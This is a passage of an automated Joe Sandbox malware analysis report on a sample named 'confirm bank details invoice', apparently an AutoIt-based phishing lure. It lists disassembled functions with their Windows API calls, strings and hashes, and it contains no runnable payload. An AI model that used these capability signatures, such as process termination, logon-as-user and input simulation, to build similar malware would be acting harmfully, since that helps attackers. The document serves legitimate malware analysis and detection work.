                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 57b0093b9c3aff7579a73db7e4d7014312df7be5f0392d2d392daeec1da80556
                    • Instruction ID: 68f4fb945cb6c99dfa924821a6c0961b4206f90c03587b486e351ccff212170f
                    • Opcode Fuzzy Hash: 57b0093b9c3aff7579a73db7e4d7014312df7be5f0392d2d392daeec1da80556
                    • Instruction Fuzzy Hash: FE31BC72504315ABD710DF149849FABB7EAFF88314F00092EF595E7281DA35EE18CB96
                    Function 004AAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004AAFAE
                    • OpenProcessToken.ADVAPI32(00000000), ref: 004AAFB5
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004AAFC4
                    • CloseHandle.KERNEL32(00000004), ref: 004AAFCF
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004AAFFE
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 004AB012
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: 5760301c1f62739c7febe0c6c9613c1e5e4e9e85f4725860f72df19e1bd98f02
                    • Instruction ID: e4a89b601f380e0f4c836dd941ea915c509199dc2e55d48800531dc692b40bc7
                    • Opcode Fuzzy Hash: 5760301c1f62739c7febe0c6c9613c1e5e4e9e85f4725860f72df19e1bd98f02
                    • Instruction Fuzzy Hash: A0218072505209AFDF128F94DD09FAF7BA9EF46308F044026FE01A6161C3799D31EB65
                    Function 004DEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0048AFE3
                      • Part of subcall function 0048AF83: SelectObject.GDI32(?,00000000), ref: 0048AFF2
                      • Part of subcall function 0048AF83: BeginPath.GDI32(?), ref: 0048B009
                      • Part of subcall function 0048AF83: SelectObject.GDI32(?,00000000), ref: 0048B033
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 004DEC20
                    • LineTo.GDI32(00000000,00000003,?), ref: 004DEC34
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004DEC42
                    • LineTo.GDI32(00000000,00000000,?), ref: 004DEC52
                    • EndPath.GDI32(00000000), ref: 004DEC62
                    • StrokePath.GDI32(00000000), ref: 004DEC72
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: b5369c3f63b3f1e5a00448dfb45a8e3148ac6aea436e794c19374a7eb3050c7d
                    • Instruction ID: 1c0cbe95751c9a0f640cd14a3a8e5746da88e51aa3eecccc837237eff1923945
                    • Opcode Fuzzy Hash: b5369c3f63b3f1e5a00448dfb45a8e3148ac6aea436e794c19374a7eb3050c7d
                    • Instruction Fuzzy Hash: E1111B7240014DBFEF129FA0DD88EEA7F6DEB08354F048122BE098A260D7719D65DBA4
                    Function 004AE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 004AE1C0
                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004AE1D1
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004AE1D8
                    • ReleaseDC.USER32(00000000,00000000), ref: 004AE1E0
                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004AE1F7
                    • MulDiv.KERNEL32(000009EC,?,?), ref: 004AE209
                      • Part of subcall function 004A9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,004A9A05,00000000,00000000,?,004A9DDB), ref: 004AA53A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CapsDevice$ExceptionRaiseRelease
                    • String ID:
                    • API String ID: 603618608-0
                    • Opcode ID: e812c4f78e2a964ac66f84ee1d9620f2b61898048aebf6a11eff5b1022bd52ae
                    • Instruction ID: 6469e660ba0ef88df759b4db18443abd5c08e3e17cb779c6d2ce3bca57570bf6
                    • Opcode Fuzzy Hash: e812c4f78e2a964ac66f84ee1d9620f2b61898048aebf6a11eff5b1022bd52ae
                    • Instruction Fuzzy Hash: 23018FB5E00214BFEB109BA68C49B6EBFB9EB59751F004066EA04E7390DA709C11CBA4
                    Function 00497B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                    Download Yara Rule
                    APIs
                    • __init_pointers.LIBCMT ref: 00497B47
                      • Part of subcall function 0049123A: __initp_misc_winsig.LIBCMT ref: 0049125E
                      • Part of subcall function 0049123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00497F51
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00497F65
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00497F78
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00497F8B
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00497F9E
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00497FB1
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00497FC4
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00497FD7
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00497FEA
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00497FFD
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00498010
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00498023
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00498036
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00498049
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0049805C
                      • Part of subcall function 0049123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0049806F
                    • __mtinitlocks.LIBCMT ref: 00497B4C
                      • Part of subcall function 00497E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0052AC68,00000FA0,?,?,00497B51,00495E77,00526C70,00000014), ref: 00497E41
                    • __mtterm.LIBCMT ref: 00497B55
                      • Part of subcall function 00497BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00497B5A,00495E77,00526C70,00000014), ref: 00497D3F
                      • Part of subcall function 00497BBD: _free.LIBCMT ref: 00497D46
                      • Part of subcall function 00497BBD: DeleteCriticalSection.KERNEL32(0052AC68,?,?,00497B5A,00495E77,00526C70,00000014), ref: 00497D68
                    • __calloc_crt.LIBCMT ref: 00497B7A
                    • GetCurrentThreadId.KERNEL32 ref: 00497BA3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                    • String ID:
                    • API String ID: 2942034483-0
                    • Opcode ID: e511608d7dc1b8ab57142567278d78f86da8d59b345e179a615c09ba7854f20b
                    • Instruction ID: 1935c91410c14499794c608037102ef26e9f49bad2b82a3c9437dfe7fbd6df5b
                    • Opcode Fuzzy Hash: e511608d7dc1b8ab57142567278d78f86da8d59b345e179a615c09ba7854f20b
                    • Instruction Fuzzy Hash: D2F0623253D2121EEE2577757C0664B2F84AF0273CB2006BFF864D51E2EB2D9942476D
                    Function 004727EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0047281D
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00472825
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00472830
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0047283B
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00472843
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0047284B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: bcbc10fa48785b462ca892bc356f71ad7650a61a60b08d939926c1ade413fd1f
                    • Instruction ID: 3ce1c627d9eb2cca6beda25ae1a9ff5b9ac8a6bacb10dfddada7fbc01d05c3bb
                    • Opcode Fuzzy Hash: bcbc10fa48785b462ca892bc356f71ad7650a61a60b08d939926c1ade413fd1f
                    • Instruction Fuzzy Hash: 520167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C87A42C7F5A864CBE5
                    Function 004B9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 1423608774-0
                    • Opcode ID: 98d0723f69459549a1dc79937195a252f36fcdda9c70b30b514cdd4914ed88d2
                    • Instruction ID: 116592b96f6ed62687d8edb3b61853f0885a8d18c97a636f8e5f90e44ccf0447
                    • Opcode Fuzzy Hash: 98d0723f69459549a1dc79937195a252f36fcdda9c70b30b514cdd4914ed88d2
                    • Instruction Fuzzy Hash: CC01A932601211ABDB151B58EC48EFF776AFF8D701B15047BF60392190DB789C10DBA8
                    Function 004B7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004B7C07
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004B7C1D
                    • GetWindowThreadProcessId.USER32(?,?), ref: 004B7C2C
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C3B
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C45
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004B7C4C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 07a6d9dce5f8ad4e3cf4a249876ef4db256c1ea7ea631021dc6fa1b76c0045b9
                    • Instruction ID: db130de70ca549be4f25b3b6a73f75bd471b8175e1c988f1fcbc8a0cdd2eef1b
                    • Opcode Fuzzy Hash: 07a6d9dce5f8ad4e3cf4a249876ef4db256c1ea7ea631021dc6fa1b76c0045b9
                    • Instruction Fuzzy Hash: B9F05E72A41158BBE7215B529C0EEFF7F7DEFC6B15F000029FA01D1151DBA05A51C6B9
                    Function 004B9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 004B9A33
                    • EnterCriticalSection.KERNEL32(?,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B9A44
                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B9A51
                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B9A5E
                      • Part of subcall function 004B93D1: CloseHandle.KERNEL32(?,?,004B9A6B,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B93DB
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004B9A71
                    • LeaveCriticalSection.KERNEL32(?,?,?,?,004E5DEE,?,?,?,?,?,0047ED63), ref: 004B9A78
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 7ffdb64c4d11e381f3ca43cf12b65b42e215528ed33819d6e483e1cccc5218f1
                    • Instruction ID: f68dfc63fa3535adb5f7bd013c1aed2d4ad1f66c62f7ecb8557ef711f5d7a8f3
                    • Opcode Fuzzy Hash: 7ffdb64c4d11e381f3ca43cf12b65b42e215528ed33819d6e483e1cccc5218f1
                    • Instruction Fuzzy Hash: 62F05E32941211ABD7111BA8EC89EFF776AFF89301F150476F603910A0DB799821EBA8
                    Function 00471CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048F4EA: std::exception::exception.LIBCMT ref: 0048F51E
                      • Part of subcall function 0048F4EA: __CxxThrowException@8.LIBCMT ref: 0048F533
                    • __swprintf.LIBCMT ref: 00471EA6
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00471D49
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 2125237772-557222456
                    • Opcode ID: b1da26f50294ed74e4267c58f9b186967dca5de0a4c195bcd3430eda5b3c78c9
                    • Instruction ID: c2044f97548e69c7219c438bb664b5d789b822765fee0b5cef27709907bd5f9c
                    • Opcode Fuzzy Hash: b1da26f50294ed74e4267c58f9b186967dca5de0a4c195bcd3430eda5b3c78c9
                    • Instruction Fuzzy Hash: 84918F71504251AFC724EF26C885CAFB7A4BF85704F00891FF889972A1DB78ED05CB9A
                    Function 004CAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 004CB006
                    • CharUpperBuffW.USER32(?,?), ref: 004CB115
                    • VariantClear.OLEAUT32(?), ref: 004CB298
                      • Part of subcall function 004B9DC5: VariantInit.OLEAUT32(00000000), ref: 004B9E05
                      • Part of subcall function 004B9DC5: VariantCopy.OLEAUT32(?,?), ref: 004B9E0E
                      • Part of subcall function 004B9DC5: VariantClear.OLEAUT32(?), ref: 004B9E1A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 3e1e9dad33fb0a1cc0d7d7db72c9a8ce7ae31c32e35a5a1e30a9229963f266e6
                    • Instruction ID: 193cedac43054cd5371d61f96263e78781e994852c15000dc15db68db15283eb
                    • Opcode Fuzzy Hash: 3e1e9dad33fb0a1cc0d7d7db72c9a8ce7ae31c32e35a5a1e30a9229963f266e6
                    • Instruction Fuzzy Hash: D19159346043019FCB50DF25D485E9BBBE4EF89704F04886EF89A9B361DB39E905CB96
                    Function 004B5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048C6F4: _wcscpy.LIBCMT ref: 0048C717
                    • _memset.LIBCMT ref: 004B5438
                    • GetMenuItemInfoW.USER32(?), ref: 004B5467
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004B5513
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004B553D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 726bcc768706a13e1df469d2a288e2bd380c7f96901fa1bace2b9bc27b4e6a55
                    • Instruction ID: 98cebddf52c6029e3ab4ad7d0bed2a8729e3db9f88490b1912a263c05472a5ac
                    • Opcode Fuzzy Hash: 726bcc768706a13e1df469d2a288e2bd380c7f96901fa1bace2b9bc27b4e6a55
                    • Instruction Fuzzy Hash: F451F371504701ABD7259B28C8417FBF7E9EF85315F080A2FF895D3290D768CD44876A
                    Function 004B0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004B027B
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004B02B1
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004B02C2
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004B0344
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: DllGetClassObject
                    • API String ID: 753597075-1075368562
                    • Opcode ID: 821ccc1a6dd468dd7704fb0897db1633bddd02f08c1634302db637e7d6c6beea
                    • Instruction ID: dcfc178123f15e80a906a73fa7d1fe897a60786a205f997dc761137942816f37
                    • Opcode Fuzzy Hash: 821ccc1a6dd468dd7704fb0897db1633bddd02f08c1634302db637e7d6c6beea
                    • Instruction Fuzzy Hash: C8416D71600204AFDB05CF54C889BAB7BF9FF44316B1480AAED099F246D7B9D944CBA4
                    Function 004B5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004B5075
                    • GetMenuItemInfoW.USER32 ref: 004B5091
                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004B50D7
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00531708,00000000), ref: 004B5120
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 5776d3994117ec1ad9cad3ec8fa998d559cd73d77485fd9c57532b9d5a0cca09
                    • Instruction ID: 4ed5ddde1f5e6235c8bcbbe4a477cf3b8a53e02e1f43ade5e911a9ce6fc0d8ee
                    • Opcode Fuzzy Hash: 5776d3994117ec1ad9cad3ec8fa998d559cd73d77485fd9c57532b9d5a0cca09
                    • Instruction Fuzzy Hash: 5441AE706047019FD720DF29D884BABBBE4AF89328F14462EF99597391D774E900CB7A
                    Function 004D0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?), ref: 004D0587
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
